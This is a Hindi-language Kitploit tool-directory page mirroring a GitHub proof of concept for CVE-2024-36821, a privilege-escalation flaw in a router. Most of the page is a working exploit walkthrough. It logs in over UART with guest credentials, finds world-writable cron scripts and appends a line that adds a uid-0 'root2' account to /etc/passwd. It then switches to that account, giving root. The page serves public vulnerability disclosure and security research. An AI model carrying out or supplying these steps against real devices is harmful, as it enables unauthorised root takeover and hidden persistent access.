Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36821 — सार्वजनिक संदर्भ जिसमें CVE-2024-36821 द्वारा कवर की गई भेद्यता के लिए न्यूनतम आवश्यक जानकारी शामिल है | Kitploit
उपकरण/GitHubGitHub/ivanglinkin/cve-2024-36821
एम्बेडेड सिस्टम सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षा
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

सार्वजनिक संदर्भ जिसमें CVE-2024-36821 द्वारा कवर की गई भेद्यता के लिए न्यूनतम आवश्यक जानकारी शामिल है

रिपॉजिटरी देखें
322 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-36821

CVE-2024-36821 द्वारा कवर की गई कमजोरी के लिए आवश्यक न्यूनतम जानकारी वाला सार्वजनिक संदर्भ

PoC के साथ मूल वीडियो आप वीडियो पर पा सकते हैं -> https://www.youtube.com/watch?v=6vHno0ik7JY

PoC:

  1. UART कनेक्शन के माध्यम से राउटर से कनेक्ट करें

  2. guest:guest क्रेडेंशियल का उपयोग करके, सिस्टम में लॉग इन करें

  3. find / -perm -777 -type f 2>/dev/null कमांड का उपयोग करके, read-write-execute अनुमतियों वाली फ़ाइलें खोजें:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 at 20 00 50
  4. ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh कमांड द्वारा स्वामी की जाँच करें

  5. openssl passwd Abracadabra कमांड द्वारा पासवर्ड जनरेट करें

  6. /tmp/cron/cron.everyminute/conntrack_collector.sh को संपादित करें, अंत में नया जनरेट किया गया पासवर्ड जोड़ें:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 at 20 05 05
  7. एक मिनट प्रतीक्षा करें

  8. निम्नलिखित कमांड द्वारा root2 उपयोगकर्ता में स्विच करें

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
टूल डाउनलोड करें